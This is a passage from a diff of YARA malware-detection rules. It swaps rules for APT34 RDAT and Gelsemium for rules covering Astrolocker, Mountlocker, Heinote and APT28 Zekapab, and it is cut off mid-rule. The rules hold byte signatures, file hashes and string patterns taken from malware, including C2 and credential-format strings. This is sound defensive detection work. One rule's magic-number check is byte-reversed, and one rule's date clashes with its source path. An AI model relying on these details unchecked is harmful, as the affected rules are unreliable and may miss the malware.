ba 25 b8 27 01 10 01 73 09 f3 aa 8b 44 24 04 8b fa c3 0f ba 25 10 20 01 10 01 0f 83 b2 00 00 00 66 0f 6e c0 66 } - $seq3 = { 8b 44 24 08 48 75 [13] be ?? 16 00 10 bb 00 10 00 10 05 [2] 00 00 2b f3 [0-3] 74 0? 8? [0-2] cf [0-4] 03 cb ?? 11 47 3b fe 72 ?? e8 ?? fd ff ff 5f 5e 5b 33 c0 40 c2 0c 00 8b ff 55 8b ec 8b 45 0c 56 57 83 f8 01 75 7c 50 e8 1c 14 00 00 59 85 c0 75 07 33 c0 e9 0e 01 00 00 e8 a6 06 00 00 85 c0 75 07 e8 32 14 00 00 eb e9 e8 af 13 00 00 ff 15 ?? 80 00 10 a3 18 b8 00 10 e8 68 12 00 00 a3 64 ac 00 10 e8 89 0c 00 00 85 c0 7d 07 e8 1f 03 00 00 eb cf e8 93 11 00 00 85 c0 7c 20 e8 12 0f 00 00 85 c0 7c 17 6a 00 e8 41 0a 00 00 59 85 c0 75 0b ff 05 60 ac 00 10 e9 a8 00 00 00 e8 a4 0e 00 00 eb c9 33 ff 3b c7 75 31 39 3d 60 ac 00 10 7e 81 ff 0d 60 ac 00 10 39 3d b4 ac 00 10 75 05 e8 d0 0b 00 00 39 7d 10 75 7b e8 77 0e 00 00 e8 bd 02 00 00 e8 a1 13 00 00 eb 6a 83 f8 02 75 59 e8 78 02 00 00 68 14 02 00 00 6a 01 e8 54 08 00 00 8b f0 59 59 3b f7 0f 84 36 ff ff ff 56 ff 35 00 a0 00 10 ff 35 7c ac 00 10 e8 d3 01 00 00 59 ff d0 85 c0 74 17 57 56 e8 b1 02 00 00 59 59 ff 15 ?? 80 00 10 83 4e 04 ff 89 06 eb 18 56 e8 3f 07 00 00 59 e9 fa fe ff ff 83 f8 03 75 07 57 e8 33 05 00 00 59 33 c0 40 5f 5e 5d c2 0c 00 6a 0c 68 d0 92 00 10 e8 ?? 15 00 00 8b f9 8b f2 8b 5d 08 33 c0 40 89 45 e4 85 f6 75 0c 39 15 60 ac 00 10 0f 84 c5 00 00 00 83 65 fc 00 3b f0 74 05 83 fe 02 75 2e a1 ?? 81 00 10 85 c0 74 08 57 56 53 ff d0 89 45 e4 83 7d e4 00 0f 84 96 00 00 00 57 56 53 e8 72 fe ff ff 89 45 e4 } + $s1 = "C:\\Users\\spartan\\Documents\\Visual Studio 2010\\new projects\\frontend\\Release\\test.pdb" fullword ascii + $s2 = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Edg/81.0.416.68" fullword ascii + $s3 = "bbLorkybbYngxkjbb]khbbmgvjgz4k~k" fullword ascii + $s4 = "8&8-8X8.959?9Q9h9v9|9" fullword ascii + $s5 = "0$0h4h5l5p5t5x5|5" fullword ascii + $s6 = "?&?+?1?7?M?T?g?z?" fullword ascii + $s7 = "12.02.1245" fullword ascii + $s8 = ">>?C?L?[?~?" fullword ascii + $s9 = "6*6=6P6b6" fullword ascii condition: - uint16(0)==0x5a4d and filesize >10KB and 2 of ($seq*) + uint16(0)==0x5a4d and filesize <30KB and 7 of them } -rule ARKBIRD_SOLG_APT_APT34_RDAT_Feb_2021_1 : FILE +rule ARKBIRD_SOLG_RAN_Astrolocker_May_2021_1 : FILE { meta: - description = "Detect Installer from APT34 group" + description = "Detect the Astrolocker ransomware" author = "Arkbird_SOLG" - id = "32f28376-e792-543b-82f7-36ec627b4fab" - date = "2021-02-26" - modified = "2021-02-27" + id = "f2c2c96a-277e-575b-8d80-4729f4a1cfe4" + date = "2020-05-12" + modified = "2021-05-16" reference = "Internal Research" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-02-26/APT34/APT_APT34_RDAT_Feb_2021_1.yar#L1-L19" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-05-12/Astrolocker/RAN_Astrolocker_May_2021_1.yara#L1-L18" license_url = "N/A" - logic_hash = "61ea6eceda0c7d6ec15db87891c4322002c112383c7a4d0089e35db9636bbe73" + logic_hash = "7e50642f5f864b7cffeb5ccf4581ac7566da24fd5361a3303a860f036cd6d439" score = 50 - quality = 73 + quality = 75 tags = "FILE" - level = "experimental" - hash1 = "65a6afc027ff851bd325d8a4f2ab4f326dd8f2c230bfd49a213c5afc00df8e2c" + hash1 = "7fe1686f4afb9907f880a5e77bf30bc00fae71980f57ca70b60b7b1716456a2f" + hash2 = "b26749b17ca691328ba67ee49d4d9997c101966c607ab578afad204459b7bf8f" + tlp = "White" + adversary = "-" + level = "Experimental" strings: - $s1 = "XAVVQxcVAVIfCBYWARQfEBldEU4ZF1JbUFJYCgpCTg==" fullword ascii - $s2 = { 0b da 89 5c 24 40 40 38 3d 55 56 } - $s3 = { 57 4e 44 31 23 31 2e 32 } - $s4 = { 63 00 6d 00 64 00 2e 00 65 00 78 00 65 00 20 00 2f 00 63 } - $seq_Service = { 4c 8b dc 57 48 81 ec e0 02 00 00 48 c7 44 24 70 fe ff ff ff 49 89 5b 10 49 89 73 18 48 8b 05 65 12 0a 00 48 33 c4 48 89 84 24 d0 02 00 00 48 8b d9 48 89 4c 24 78 41 b8 04 01 00 00 49 8d 93 d8 fd ff ff 33 c9 ff 15 9d 20 07 00 85 c0 75 19 ff 15 33 21 07 00 8b d0 48 8d 0d 8a b6 08 00 e8 1d f7 ff ff e9 a5 01 00 00 33 f6 48 89 b4 24 90 00 00 00 48 89 b4 24 98 00 00 00 45 33 c0 33 d2 48 8d 8c 24 80 00 00 00 e8 d4 9f ff ff 66 39 b4 24 c0 00 00 00 75 05 44 8b c6 eb 1f 48 8d 84 24 c0 00 00 00 49 83 c8 ff 66 0f 1f 84 00 00 00 00 00 49 ff c0 66 42 39 34 40 75 f6 48 8d 94 24 c0 00 00 00 48 8d 8c 24 80 00 00 00 e8 41 05 00 00 90 4c 8b c3 48 8d 8c 24 a0 00 00 00 e8 60 0a 00 00 90 49 83 c9 ff 45 33 c0 48 8b d0 48 8d 8c 24 80 00 00 00 e8 a8 07 00 00 90 45 33 c0 b2 01 48 8d 8c 24 a0 00 00 00 e8 55 9f ff ff 33 d2 33 c9 41 b8 3f 00 0f 00 ff 15 d5 1e 07 00 48 8b f8 48 85 c0 75 19 ff 15 5f 20 07 00 8b d0 48 8d 0d de b5 08 00 e8 49 f6 ff ff e9 be 00 00 00 4c 8d 8c 24 80 00 00 00 48 83 bc 24 98 00 00 00 08 4c 0f 43 8c 24 80 00 00 00 48 8d 15 33 7a 0a 00 4c 8b c2 48 83 3d 40 7a 0a 00 08 4c 0f 43 05 20 7a 0a 00 48 0f 43 15 18 7a 0a 00 48 89 74 24 60 48 89 74 24 58 48 89 74 24 50 48 89 74 24 48 48 89 74 24 40 4c 89 4c 24 38 c7 44 24 30 01 00 00 00 c7 44 24 28 02 00 00 00 c7 44 24 20 10 00 00 00 41 b9 ff 01 0f 00 48 8b c8 ff 15 23 1e 07 00 48 8b f0 48 85 c0 75 16 ff 15 bd 1f 07 00 8b d0 48 8d 0d 5c b5 08 00 e8 a7 f5 ff ff eb 15 48 8d 0d 6e b5 08 00 e8 99 f5 ff ff 48 8b ce ff 15 e0 1d 07 00 48 8b cf ff 15 d7 1d 07 00 90 45 33 c0 b2 01 48 8d 8c 24 80 00 00 00 e8 54 9e ff ff 90 45 33 c0 b2 01 48 8b cb e8 46 9e ff ff 48 8b 8c 24 d0 02 00 00 48 33 cc e8 d6 94 02 00 4c 8d 9c 24 e0 02 00 00 49 8b 5b 18 49 8b 73 20 49 8b e3 5f } - $seq_ConnectC2 = { 33 c0 48 89 44 24 70 48 89 44 24 78 66 89 7c 24 70 8d 48 35 ff 15 2f 62 07 00 66 89 44 24 72 48 8b cb e8 ea dc ff ff 48 8b c8 ff 15 29 62 07 00 89 44 24 74 49 8b cd e8 d5 dc ff ff 48 8b d0 c7 44 24 28 10 00 00 00 48 8d 44 24 70 48 89 44 24 20 45 33 c9 45 8b 45 10 49 8b cc ff 15 e0 61 07 00 83 f8 ff 75 12 45 33 c0 48 8d 15 6b cb 08 00 48 8b ce e8 79 de ff ff 4c 89 a4 24 a8 00 00 00 c7 84 24 a0 00 00 00 01 00 00 00 48 c7 44 24 38 0a 00 00 00 41 8d 4c 24 01 48 8d 44 24 38 48 89 44 24 20 45 33 c9 45 33 c0 48 8d 94 24 a0 00 00 00 ff 15 aa 61 07 00 83 f8 01 0f 94 c0 84 c0 0f 84 0f 01 00 00 45 33 c9 41 b8 00 02 00 00 48 8d 94 24 b0 02 00 00 49 8b cc ff 15 72 61 07 00 4c 63 c0 85 c0 0f 8e ea 00 00 00 41 8b c8 49 8b d0 49 8b c0 45 85 c0 0f 8e d8 00 00 00 0f 1f 44 00 00 80 bc 04 b0 02 00 00 00 0f 85 b7 00 00 00 48 3b d0 0f 84 ae 00 00 00 85 c9 0f 84 b4 00 00 00 83 c1 03 41 3b c8 0f 8d a8 00 00 00 48 8d 9c 24 b0 02 00 00 48 03 da 48 63 c1 48 8d bc 24 b0 02 00 00 48 03 f8 4c 89 b4 24 90 00 00 00 4c 89 b4 24 98 00 00 00 45 33 c0 33 d2 48 8d 8c 24 80 00 00 00 e8 0a dd ff ff 48 3b fb 74 17 48 2b df 4c 8b c3 48 8b d7 48 8d 8c 24 80 00 00 00 e8 6f dd ff ff 90 48 8d 84 24 80 00 00 00 48 3b f0 74 18 49 83 c9 ff 45 33 c0 48 8d 94 24 80 00 00 00 48 8b ce e8 2a de ff ff 90 45 33 c0 b2 01 48 8d 8c 24 80 00 00 00 e8 b7 dc ff ff 48 8b 5c 24 48 bf } - $seq_RegisterEvent = { 40 53 48 83 ec 20 48 83 3d 5a 79 0a 00 08 48 8d 1d 3b 79 0a 00 48 8b cb 48 8d 15 91 01 00 00 48 0f 43 0d 29 79 0a 00 ff 15 93 1d 07 00 48 89 05 44 77 0a 00 48 8b c8 48 85 c0 75 2d 48 83 3d 24 79 0a 00 08 48 0f 43 1d 04 79 0a 00 48 8b d3 ff 15 7b 1d 07 00 48 85 c0 74 62 48 8b c8 ff 15 35 1d 07 00 48 83 c4 20 5b c3 33 c0 c7 05 db 76 0a 00 10 00 00 00 48 89 05 e0 76 0a 00 48 8d 15 cd 76 0a 00 8b 05 17 1c 0a 00 89 05 d5 76 0a 00 ff c0 89 05 09 1c 0a 00 48 c7 05 b2 76 0a 00 02 00 00 00 c7 05 bc 76 0a 00 b8 0b 00 00 ff 15 06 1d 07 00 48 83 c4 20 5b } + $seq_Mar_2021_1 = { 6a 00 6a 00 ff 15 88 60 41 00 81 3d cc e6 b8 02 57 0f 00 00 8b 0d b4 c4 41 00 8b 15 b8 c4 41 00 a1 bc c4 41 00 89 4c 24 2c 89 54 24 20 89 44 24 24 75 14 6a 00 6a 00 6a 00 6a 00 6a 00 6a 00 6a 00 ff 15 28 60 41 00 8b 2d a8 60 41 00 c7 44 24 1c 20 00 00 00 8d 9b 00 00 00 00 8b 54 24 18 8b ce c1 e1 04 03 4c 24 20 8b c6 c1 e8 05 89 4c 24 14 8d 0c 32 89 44 24 10 8b 44 24 24 01 44 24 10 31 4c 24 14 81 3d cc e6 b8 02 f5 03 00 00 c7 05 0c da b8 02 36 06 ea e9 75 08 6a 00 ff 15 5c 60 41 00 8b 4c 24 14 31 4c 24 10 83 3d cc e6 b8 02 42 75 30 6a 00 6a 00 6a 00 ff d5 6a 30 8d 54 24 3c 6a 00 52 c7 44 24 40 00 00 00 00 e8 5a 5e ff ff 83 c4 0c 6a 00 8d 44 24 38 50 6a 00 ff 15 00 60 41 00 2b 5c 24 10 8b cb c1 e1 04 81 3d cc e6 b8 02 8c 07 00 00 89 4c 24 14 75 09 6a 00 6a 00 e8 d2 eb fe ff } + $seq_Apr_2021_1 = { 89 44 24 38 48 8b 05 78 4e 00 00 48 89 05 b9 9e 00 00 48 8b 05 52 4e 00 00 48 89 05 b3 9e 00 00 48 8b 05 4c 4e 00 00 48 89 05 ad 9e 00 00 48 8b 05 46 4e 00 00 48 89 05 a7 9e 00 00 8b 05 51 9e } condition: - uint16(0)==0x5a4d and filesize >80KB and all of ($s*) and 2 of ($seq*) + uint16(0)==0x5a4d and filesize >30KB and 1 of ($seq*) } -rule ARKBIRD_SOLG_APT_Gelsemium_Gelsenicine_June_2021_1 : FILE +rule ARKBIRD_SOLG_RAN_Mountlocker_May_2021_1 : FILE { meta: - description = "Detect Gelsenicine malware (Loader - Variant 1)" + description = "Detect the Mountlocker ransomware" author = "Arkbird_SOLG" - id = "36276150-a5dd-5385-9e50-958a6fa54de5" - date = "2021-06-12" - modified = "2021-06-14" - reference = "https://www.welivesecurity.com/wp-content/uploads/2021/06/eset_gelsemium.pdf" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-06-13/Gelsemium/APT_Gelsemium_Gelsenicine_June_2021_1.yara#L1-L19" + id = "0bc0d341-4658-500e-b487-1993e5431560" + date = "2020-05-12" + modified = "2021-05-16" + reference = "Internal Research" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-05-12/Astrolocker/RAN_MountLocker_May_2021_1.yara#L1-L20" license_url = "N/A" - logic_hash = "66d9fad7105b46a55db11c5224b1a395793f2dee89f779d59c80b2f7cda5a115" + logic_hash = "c0826d4c740b5c46b704b42e002602dd0cda2b6d1bf0ba5431877be8bd600b64" score = 75 quality = 75 tags = "FILE" - hash1 = "97982e098a4538d05e78c172c9bbc5b412754df86dc73e760004f0038ec928fb" - hash2 = "46338cae732ee1664aac77d9dce57c4ff8666460c1a51bee49cae44c86e42df9" - hash3 = "f0d23aa026ae6ba96051401dc2b390ba5c968d55c2a4b31a36e45fb67dfc2e3c" - tlp = "white" - adversary = "Gelsemium" + hash1 = "0aa8099c5a65062ba4baec8274e1a0650ff36e757a91312e1755fded50a79d47" + hash2 = "f570d5b17671e6f3e56eae6ad87be3a6bbfac46c677e478618afd9f59bf35963" + hash3 = "5eae13527d4e39059025c3e56dad966cf67476fe7830090e40c14d0a4046adf0" + tlp = "White" + adversary = "MountLocker" strings: - $s1 = { b8 [3] 74 e8 [2] 00 00 81 ec bc 03 00 00 53 56 57 be [3] 74 8d bd 38 fc ff ff 6a 1b a5 a5 a5 a5 66 a5 59 33 c0 8d bd 4a fc ff ff be [3] 74 f3 ab 66 ab 8d bd b8 fc ff ff 6a 1c a5 a5 a5 a5 59 33 c0 8d bd c8 fc ff ff 6a 07 f3 ab 59 be [3] 74 8d bd 38 fd ff ff 6a 18 f3 a5 66 a5 8b 5d 0c 59 8d bd 56 fd ff ff 83 65 cc 00 f3 ab 66 ab 8a 03 6a 00 8d 4d e0 c7 45 c0 24 00 00 00 c7 45 c4 25 00 00 00 c7 45 c8 23 00 00 00 88 45 e0 ff 15 [3] 74 a1 [3] 74 8d 4d e0 ff 30 6a 00 53 ff 15 [3] 74 8a 45 0f 6a 00 8d 4d d0 c7 45 fc 01 00 00 00 88 45 d0 ff 15 [3] 74 8b 35 [3] 74 bf [3] 74 57 ff d6 59 50 57 8d 4d d0 ff 15 [3] 74 8b 55 d4 8b 0d [3] 74 85 d2 c6 45 fc 02 75 02 8b d1 8b 43 04 85 c0 75 02 8b c1 ff 75 d8 52 50 ff 15 [3] 74 83 c4 0c 85 c0 0f 85 d9 00 00 00 8d 85 b8 fd ff ff 50 68 04 01 00 00 ff 15 [3] 74 8d 85 b8 fd ff ff 50 ff d6 85 c0 59 0f 84 b5 00 00 00 8d 85 b8 fd ff ff 50 ff d6 66 83 bc 45 b6 fd ff ff 2f 59 74 56 8d 85 b8 fd ff ff 50 ff d6 66 83 bc 45 b6 fd ff ff 5c 59 74 41 8d 4d e0 ff 15 [3] 74 8b 7d e4 8b 5d d8 8d 4d e0 ff 15 [3] 74 8b 45 e4 89 45 f0 8d 85 b8 fd ff ff 50 ff d6 59 8d 84 45 b8 fd ff ff 50 8d 85 b8 fd ff ff 50 8d 44 5f fe 50 ff } - $s2 = { ff 75 0c 89 45 f0 ff d6 50 ff 75 0c ff 75 f0 ff 15 [3] 74 83 c4 10 85 c0 } - $s3 = "pluginkey" fullword wide - $s4 = { 55 8b ec 51 33 c0 56 f6 05 [3] 74 01 89 45 fc 0f 85 c6 00 00 00 8a 4d 0b 80 0d [3] 74 01 53 bb [3] 74 57 88 0d [3] 74 50 8b cb ff 15 [3] 74 8b 35 [3] 74 bf [3] 74 57 ff d6 59 50 57 8b cb ff 15 [3] 74 8a 45 0b bb [3] 74 6a 00 8b cb a2 [3] 74 ff 15 [3] 74 bf [3] 74 57 ff d6 59 50 57 8b cb ff 15 [3] 74 8a 45 0b bb [3] 74 6a 00 8b cb a2 [3] 74 ff 15 [3] 74 bf [3] 74 57 ff d6 59 50 57 8b cb ff 15 [3] 74 8a 45 0b bb [3] 74 6a 00 8b cb a2 [3] 74 ff 15 [3] 74 bf [3] 74 57 ff d6 59 50 57 8b cb ff 15 [3] 74 68 [2] e2 74 e8 [2] 00 00 59 5f 33 c0 5b 8b 75 08 8a 4d 0b 68 [3] 74 68 [3] 74 88 0e 50 8b ce 89 46 04 89 46 08 89 46 0c e8 [2] 00 00 8b c6 5e } + $seq_Sep_2020_1 = { 40 53 48 81 ec f0 02 00 00 b9 e8 03 00 00 ff 15 ec 1a 00 00 bb 68 00 00 00 48 8d 4c 24 70 44 8b c3 33 d2 e8 9c 00 00 00 ba 04 01 00 00 89 5c 24 70 48 8d 8c 24 e0 00 00 00 ff 15 51 1a 00 00 48 8d 15 a2 9c 00 00 48 8d 8c 24 e0 00 00 00 ff 15 64 1a 00 00 48 8d 44 24 50 45 33 c9 48 89 44 24 48 48 8d 94 24 e0 00 00 00 48 8d 44 24 70 45 33 c0 48 89 44 24 40 33 c9 48 83 64 24 38 00 48 83 64 24 30 00 c7 44 24 28 10 00 00 00 83 64 24 20 00 ff 15 c1 19 00 00 8b d8 85 c0 74 16 48 8b 4c 24 58 ff 15 50 1a 00 00 48 8b 4c 24 50 ff 15 45 1a 00 00 8b c3 48 81 c4 f0 02 } + $seq_Sep_2020_2 = { 68 00 00 00 f0 6a 01 68 a0 51 00 10 57 8d 45 f8 89 5d f4 50 89 7d f8 89 7d fc ff 15 30 50 00 10 85 c0 0f 84 81 00 00 00 8d 45 fc 50 57 57 68 14 01 00 00 68 d0 d0 00 10 ff 75 f8 ff 15 08 50 00 10 8b f0 85 f6 74 26 68 00 01 00 00 8d 45 f4 50 68 60 42 01 10 57 6a 01 57 ff 75 fc ff 15 04 50 00 10 ff 75 fc 8b f0 ff 15 00 50 00 10 57 ff 75 f8 ff 15 0c 50 00 10 } + $seq_Jan_2021_1 = { 48 21 4d 77 4c 8d 05 [2] 00 00 48 21 4d 6f ?? 8b ?? 48 8d 4d 77 [6-9] c7 44 24 20 00 00 00 f0 ff 15 [2] 00 00 85 c0 0f 84 [2] 00 00 48 8b 4d 77 48 8d 45 6f 48 89 44 24 28 48 8d [3] 00 00 83 64 24 20 00 [2-5] c9 41 b8 14 01 00 00 ff 15 [2] 00 00 8b d8 85 c0 74 3b 48 8b 4d 6f 48 8d 45 67 c7 44 24 30 00 01 00 00 45 33 c9 48 89 44 24 28 ?? 8b ?? 48 8d 05 [2-3] 00 33 d2 48 89 44 24 20 ff 15 [2] 00 00 48 8b 4d 6f 8b d8 ff 15 [2] 00 00 48 8b 4d 77 33 d2 ff 15 [2] 00 00 85 db [4-12] 00 00 48 8d } + $seq_Jan_2021_2 = { 4c 8d 05 20 47 00 00 41 8b ce 48 8d 15 1e 47 00 00 e8 [2] 00 00 ba 04 01 00 00 48 8d 4c 24 40 ff 15 ?? 43 00 00 85 c0 75 12 b8 5c 00 00 00 c7 44 24 40 43 00 3a 00 66 89 44 24 44 89 6c 24 38 4c 8d 8c 24 78 02 00 00 48 89 6c 24 30 48 8d 4c 24 40 48 89 6c 24 28 45 33 c0 33 d2 48 89 6c 24 20 66 89 6c 24 46 ff 15 6b 44 00 00 44 8b 84 24 78 02 00 00 48 8d 15 e4 45 00 00 85 c0 b9 bd 07 a2 41 44 0f 44 c1 41 8b c8 44 89 84 24 78 02 00 00 c1 c9 09 41 8b c0 89 4c 24 28 45 8b c8 c1 c8 06 48 8d 4c 24 40 41 c1 c9 03 89 44 24 20 ff 15 8b 44 00 00 4c 8d 44 24 40 33 d2 33 c9 ff 15 ?? 42 00 00 48 85 c0 74 1b ff 15 [2] 00 00 3d b7 00 00 00 74 0e bf 01 00 00 00 48 8d 15 fe 45 00 00 eb 09 8b fd 48 8d 15 a3 45 00 00 41 8b } condition: - uint16(0)==0x5a4d and filesize >15KB and 3 of ($s*) + uint16(0)==0x5a4d and filesize >30KB and 1 of ($seq*) } -rule ARKBIRD_SOLG_APT_Gelsemium_Gelsemine_June_2021_1 : FILE +rule ARKBIRD_SOLG_MAL_Heinote_June_2020_1 : FILE { meta: - description = "Detect Gelsemine malware (Dropper - Variant 1)" + description = "Detect Hienote malware" author = "Arkbird_SOLG" - id = "cfe932fd-ff50-5e54-824c-e11afe8e8575" - date = "2021-06-12" - modified = "2021-06-14" - reference = "https://www.welivesecurity.com/wp-content/uploads/2021/06/eset_gelsemium.pdf" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-06-13/Gelsemium/APT_Gelsemium_Gelsemine_June_2021_1.yara#L1-L19" + id = "5c0e604a-83d4-5c6f-83fa-0df878da80d8" + date = "2020-06-26" + modified = "2023-11-22" + reference = "https://twitter.com/JAMESWT_MHT/status/1276471822217891840" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-06-26/Heinote_June_2020-1.yar#L1-L29" license_url = "N/A" - logic_hash = "2b5031412de163ad92dfe00c7da331eb36c4ce7b590df48dfa84df0104e93b15" + logic_hash = "679f1113c9c770910d18da395b13aaef009ecdde91a0c11f931d0d7e63ed122a" score = 75 - quality = 75 + quality = 61 tags = "FILE" - hash1 = "00b701e3ef29912c1fcd8c2154c4ae372cfe542cfa54ffcce9fb449883097cec" - hash2 = "109d4b8878b8c8f3b7015f6b3ae573a6799296becce0f32ca3bd216bee0ab473" - hash3 = "fe71b66d65d5ff9d03a47197c99081d9ec8d5f6e95143bdc33f5ea2ac0ae5762" - hash3 = "29e78ca3cb49dd2985a29e74cafb1a0a15515670da0f4881f6095fb2926bfefd" - tlp = "white" - adversary = "Gelsemium" + hash1 = "e0a34b9c420ddd930b3f89c13c3f564907dd948e88f668a0fe55ce506220bd73" strings: - $s1 = { 8b 44 24 04 83 ec 40 85 c0 53 55 56 57 0f 84 ec 15 00 00 8b 58 1c 85 db 0f 84 e1 15 00 00 8b 48 0c 85 c9 0f 84 d6 15 00 00 83 38 00 75 0b 8b 48 04 85 c9 0f 85 c6 15 00 00 83 3b 0b 75 06 c7 03 0c 00 00 00 8b 48 0c 8b 30 8b 78 04 8b 53 38 8b 6b 3c 89 4c 24 28 8b 48 10 8b 03 83 f8 1e 89 4c 24 20 89 74 24 14 89 7c 24 18 89 54 24 10 89 7c 24 38 89 4c 24 2c c7 44 24 34 00 00 00 } - $s2 = { 33 c0 33 d2 8a 06 8a 56 01 03 c8 33 c0 8a 46 02 03 f9 03 ca 33 d2 8a 56 03 03 f9 03 c8 33 c0 8a 46 04 03 f9 03 ca 33 d2 8a 56 05 03 f9 03 c8 33 c0 8a 46 06 03 f9 03 ca 33 d2 8a 56 07 03 f9 03 c8 33 c0 8a 46 08 03 f9 03 ca 33 d2 8a 56 09 03 f9 03 c8 33 c0 8a 46 0a 03 f9 03 ca 33 d2 8a 56 0b 03 f9 03 c8 33 c0 8a 46 0c 03 f9 03 ca 33 d2 8a 56 0d 03 f9 03 c8 33 c0 8a 46 0e 03 f9 03 ca 33 d2 8a 56 0f 03 f9 03 c8 83 c6 10 03 f9 03 ca 03 f9 4d 0f 85 67 ff ff ff 8b c1 33 d2 b9 f1 ff 00 00 f7 f1 8b c7 bf f1 ff 00 00 8b ca 33 d2 f7 f7 ff 4c 24 18 8b fa 0f 85 38 ff ff ff 85 db 0f 84 da 00 00 00 83 fb 10 0f 82 a1 00 00 00 8b eb c1 ed 04 33 d2 33 c0 8a 16 8a 46 01 03 ca 33 d2 8a 56 02 03 f9 03 c8 33 c0 8a 46 03 03 f9 03 ca 33 d2 8a 56 04 03 f9 03 c8 33 c0 8a 46 05 03 f9 03 ca 33 d2 8a 56 06 03 f9 03 c8 33 c0 8a 46 07 03 f9 03 ca 33 d2 8a 56 08 03 f9 03 c8 33 c0 8a 46 09 03 f9 03 ca 33 d2 8a 56 0a 03 f9 03 c8 33 c0 8a 46 0b 03 f9 03 ca 33 d2 8a 56 0c 03 f9 03 c8 33 c0 8a 46 0d 03 f9 03 ca 33 d2 8a 56 0e 03 f9 03 c8 33 c0 8a 46 0f 03 f9 03 ca 83 eb 10 03 f9 03 c8 03 f9 83 c6 10 } - $s3 = { 55 8b ec 6a ff 68 [2] 40 00 68 [2] 40 00 64 a1 00 00 00 00 50 64 89 25 00 00 00 00 83 ec 68 53 56 57 89 65 e8 33 db 89 5d fc 6a 02 5f 57 ff 15 [2] 40 00 59 83 0d [2] 41 00 ff 83 0d [2] 41 00 ff ff 15 [2] 40 00 8b 0d [2] 41 00 89 08 ff 15 [2] 40 00 8b 0d [2] 41 00 89 08 a1 [2] 40 00 8b 00 a3 [2] 41 00 e8 ?? 01 00 00 39 1d [3] 00 75 0c 68 [2] 40 00 ff 15 [2] 40 00 59 e8 ?? 01 00 00 68 [3] 00 68 [3] 00 e8 ?? 01 00 00 a1 [2] 41 00 89 45 94 8d 45 94 50 ff 35 [2] 41 00 8d 45 9c 50 8d 45 90 50 8d 45 a0 50 ff 15 [2] 40 00 68 [3] 00 68 00 [2] 00 e8 ?? 01 00 00 83 c4 24 a1 [2] 40 00 8b 30 3b } + $s1 = { 5b 44 45 42 55 47 49 4e 46 4f 5d 5b 4c 4f 43 4b 5d 5b 53 45 54 5d 2d 2d 2d 2d } + $s2 = { 5b 44 45 42 55 47 49 4e 46 4f 5d 5b 4c 4f 43 4b 5d 5b 47 45 54 5d 2d 2d 2d 2d } + $s3 = { 5b 44 45 42 55 47 49 4e 46 4f 5d 5b 4c 4f 43 4b 5d 5b 47 45 54 5d 5b 53 48 48 65 6c 70 65 72 5d 20 47 65 74 4d 61 69 6e 50 61 67 65 20 6c 70 73 7a 75 72 6c 20 3d 20 25 73 } + $s4 = { 5b 44 45 42 55 47 49 4e 46 4f 5d 5b 4c 4f 43 4b 5d 5b 53 45 54 5d 5b 53 48 48 65 6c 70 65 72 5d 20 73 74 61 74 75 73 20 3d 20 25 64 2f 25 64 20 67 65 74 20 3d 20 25 73 20 73 65 74 20 3d 20 25 73 } + $s5 = { 44 65 62 75 67 49 6e 66 6f } + $s6 = { 5b 44 45 42 55 47 49 4e 46 4f 5d 5b 46 41 56 5d 5b 53 45 54 5d 2d 2d 2d 2d } + $s7 = { 5b 44 45 42 55 47 49 4e 46 4f 5d 5b 46 41 56 5d 5b 53 45 54 5d 5b 53 48 48 65 6c 70 65 72 5d 20 66 61 76 20 72 65 74 20 3d 20 25 64 0a } + $s8 = { 5b 44 45 42 55 47 49 4e 46 4f 5d 5b 46 41 56 5d 5b 53 45 54 5d 5b 53 48 48 65 6c 70 65 72 5d 20 69 20 3d 20 25 64 20 6c 70 73 7a 4d 61 67 69 63 20 3d 20 25 73 0a } + $s9 = { 5b 44 45 42 55 47 49 4e 46 4f 5d 5b 53 45 54 43 4f 4f 4b 49 45 48 41 4f 31 32 33 5d 20 6f 6b 20 6f 6b 0a } + $s10 = { 75 73 65 72 6e 61 6d 65 3d 22 25 73 22 2c 20 72 65 61 6c 6d 3d 22 25 73 22 2c 20 6e 6f 6e 63 65 3d 22 25 73 22 2c 20 75 72 69 3d 22 25 73 22 2c 20 63 6e 6f 6e 63 65 3d 22 25 73 22 2c 20 6e 63 3d 25 30 38 78 2c 20 71 6f 70 3d 25 73 2c 20 72 65 73 70 6f 6e 73 65 3d 22 25 73 22 } + $s11 = "System\\CurrentControlSet\\Control\\Keyboard Layouts\\%.8x" fullword ascii + $s12 = { 25 73 20 63 6f 6f 6b 69 65 20 25 73 3d 22 25 73 22 20 66 6f 72 20 64 6f 6d 61 69 6e 20 25 73 2c 20 70 61 74 68 20 25 73 2c 20 65 78 70 69 72 65 20 25 49 36 34 64 0a } + $s13 = "User-Agent: %s" fullword ascii + $s14 = "Send failure: %s" fullword ascii + $s15 = "ftp://%s:%s@%s" fullword ascii + $s16 = "Host: %s%s%s" fullword ascii + $s17 = "Referer: %s" fullword ascii condition: - uint16(0)==0x5a4d and filesize >150KB and all of ($s*) + uint16(0)==0x4D5A and filesize <450KB and 14 of them } -rule ARKBIRD_SOLG_APT_Gelsemium_Gelsevirine_June_2021_1 : FILE +rule ARKBIRD_SOLG_APT_APT28_Zekapab_Mar_2021_1 : FILE { meta: - description = "Detect Gelsevirine malware (Main Plug-in)" + description = "Detect Zekapab used by APT28 group" author = "Arkbird_SOLG" - id = "31900186-2531-5558-aafb-67707040ddaf" - date = "2021-06-12" - modified = "2021-06-14" - reference = "https://www.welivesecurity.com/wp-content/uploads/2021/06/eset_gelsemium.pdf" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-06-13/Gelsemium/APT_Gelsemium_Gelsevirine_June_2021_1.yara#L1-L18" + id = "634f32dd-8bcf-5c58-a335-9b66ff568a54" + date = "2021-03-15" + modified = "2021-03-15" + reference = 